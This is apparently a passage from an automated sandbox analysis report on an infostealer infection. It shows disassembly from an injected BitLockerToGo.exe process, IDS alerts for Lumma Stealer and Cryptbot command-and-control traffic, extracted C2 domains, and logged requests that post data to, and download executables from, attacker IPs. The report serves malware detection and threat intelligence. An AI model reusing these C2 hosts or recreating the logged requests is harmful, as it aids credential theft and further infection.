            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], ax19_2_0043F5EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 2EE0190Fh19_2_0043F5EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]19_2_0040F040
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+eax*8], 77A9E0C4h19_2_0043885D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00429069
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]19_2_00413030
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [edx]19_2_004068E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h19_2_004220E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax19_2_0040A080
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax19_2_0040A080
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]19_2_0041E88F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [ebx]19_2_004438B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]19_2_0041E94C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h19_2_00414170
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx19_2_00415106
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]19_2_00413109
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [00449030h]19_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000170h]19_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+48h]19_2_0041A130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h19_2_00443130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]19_2_0042B9C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 44CAAEB6h19_2_0043D9C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]19_2_004129E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al19_2_0041D248
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al19_2_0041D248
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-6Ch], 7C7D7A7Bh19_2_00425231
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_004412A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [esp+10h]19_2_004012AA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00422340
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0040DB60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]19_2_0040DB60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+18h]19_2_00437B20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]19_2_0043C3C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 625B6034h19_2_0043C3C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]19_2_004353F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, word ptr [edx]19_2_00425459
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx19_2_0040E4D5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00428EEB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]19_2_004424E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]19_2_0041DC80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0043C4A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]19_2_00442CA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E8h]19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+0000072Ch]19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], cl19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], dl19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], cl19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+14h]19_2_0042BCB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h19_2_0042B550
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+38h]19_2_00440D50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h19_2_00419570
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h19_2_004145F5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi19_2_0042A623
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]19_2_00406E50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [edi+ebp]19_2_00405670
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]19_2_0043A670
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi19_2_0042A623
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, eax19_2_0040E62A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]19_2_0041163C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00428EEB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]19_2_0043D6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]19_2_00410680
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]19_2_00424702
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]19_2_0042AF10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]19_2_0043CF20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+48h]19_2_0041C790
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], CECD21FDh19_2_0043BF90

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2055881 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (keennylrwmqlw .shop) : 192.168.2.8:57550 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055893 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tesecuuweqo .shop) : 192.168.2.8:59015 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055883 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licenseodqwmqn .shop) : 192.168.2.8:60842 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055887 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relaxatinownio .shop) : 192.168.2.8:55215 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055885 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reggwardssdqw .shop) : 192.168.2.8:63374 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055891 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencctywop .shop) : 192.168.2.8:60750 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055895 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tryyudjasudqo .shop) : 192.168.2.8:55868 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055879 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop) : 192.168.2.8:55039 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49762 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49758 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49768 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49748 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49747 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49763 -> 5.53.124.195:80
            Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49750 -> 5.53.124.195:80
            Source: Malware configuration extractorURLs: keennylrwmqlw.shop
            Source: Malware configuration extractorURLs: relaxatinownio.shop
            Source: Malware configuration extractorURLs: tesecuuweqo.shop
            Source: Malware configuration extractorURLs: tryyudjasudqo.shop
            Source: Malware configuration extractorURLs: licenseodqwmqn.shop
            Source: Malware configuration extractorURLs: reggwardssdqw.shop
            Source: Malware configuration extractorURLs: tendencctywop.shop
            Source: Malware configuration extractorURLs: eemmbryequo.shop
            Source: Malware configuration extractorURLs: tventyvf20vs.top
            Source: Malware configuration extractorURLs: analforeverlovyu.top
            Source: Malware configuration extractorURLs: @tventyvf20vs.top
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:29 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 22 Sep 2024 12:40:07 GMTETag: "1fafc00-622b49283eea0"Accept-Ranges: bytesContent-Length: 33225728Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 d4 f7 01 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 c6 00 00 0e 1a 00 00 00 00 00 60 75 07 00 00 10 00 00 00 c0 d3 01 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 ff 01 00 04 00 00 cb c1 fb 01 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 ee 01 4c 04 00 00 00 10 fc 01 36 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ee 01 18 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 d3 01 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 86 c6 00 00 10 00 00 00 88 c6 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c 1d 0d 01 00 a0 c6 00 00 1e 0d 01 00 8c c6 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c e7 1a 00 00 c0 d3 01 00 e8 16 00 00 aa d3 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 b0 ee 01 00 06 00 00 00 92 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 18 3b 0d 00 00 c0 ee 01 00 3c 0d 00 00 98 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 00 fc 01 00 02 00 00 00 d4 f7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 36 24 03 00 00 10 fc 01 00 26 03 00 00 d6 f7 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:29 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 24 Sep 2024 13:19:42 GMTETag: "658e0b-622dd5bbaa387"Accept-Ranges: bytesContent-Length: 6655499Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 cd 30 f1 66 00 2c 5f 00 fb 25 00 00 e0 00 06 01 0b 01 02 23 00 ec 47 00 00 7e 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 c6 00 00 06 00 00 65 e5 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 60 b3 00 42 00 00 00 00 70 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b3 00 a0 28 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 ab 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 71 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 eb 47 00 00 10 00 00 00 ec 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 c8 14 00 00 00 00 48 00 00 16 00 00 00 f2 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 58 9d 00 00 00 20 48 00 00 9e 00 00 00 08 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 b8 a3 03 00 00 c0 48 00 00 a4 03 00 00 a6 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 70 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 60 b3 00 00 02 00 00 00 4a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 70 b3 00 00 0a 00 00 00 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 80 b3 00 00 02 00 00 00 56 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 90 b3 00 00 02 00 00 00 58 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 a0 28 0e 00 00 a0 b3 00 00 2a 0e 00 00 5a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 d0 c1 00 00 08 00 00 00 84 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 e0 c1 00 00 a8 01 00 00 8c 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 90 c3 00 00 4e 00 00 00 34 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 22 Sep 2024 12:41:11 GMTETag: "1a27530-622b4964af59a"Accept-Ranges: bytesContent-Length: 27424048Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e 11 0d a7 5a 70 63 f4 5a 70 63 f4 5a 70 63 f4 11 08 60 f5 5d 70 63 f4 11 08 66 f5 ee 70 63 f4 11 08 67 f5 50 70 63 f4 99 f3 9e f4 59 70 63 f4 99 f3 60 f5 53 70 63 f4 99 f3 67 f5 4b 70 63 f4 99 f3 66 f5 72 70 63 f4 11 08 62 f5 51 70 63 f4 5a 70 62 f4 c1 70 63 f4 4f f4 67 f5 43 70 63 f4 4f f4 61 f5 5b 70 63 f4 52 69 63 68 5a 70 63 f4 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 ff 71 ec 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 a0 02 00 00 8e 05 00 00 00 00 00 b0 cd 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 87 97 a2 01 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ca 03 00 78 00 00 00 00 70 04 00 e1 27 04 00 00 40 04 00 50 22 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 64 07 00 00 80 a0 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9f 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 9f 02 00 00 10 00 00 00 a0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 2a 01 00 00 b0 02 00 00 2c 01 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 53 00 00 00 e0 03 00 00 0e 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 50 22 00 00 00 40 04 00 00 24 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e1 27 04 00 00 70 04 00 00 28 04 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 07 00 00 00 a0 08 00 00 08 00 00 00 2a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: unknownDNS query: name: api64.ipify.org
            Source: unknownDNS query: name: ipinfo.io
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49735 -> 103.130.147.211:80
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49734 -> 103.130.147.211:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49734 -> 103.130.147.211:80
            Source: global trafficHTTP traffic detected: GET /1S3fd7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplog.co
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.91.200.135
            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 45.91.200.135
            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 45.91.200.135
            Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 45.91.200.135
            Source: global trafficHTTP traffic detected: HEAD /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: HEAD /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
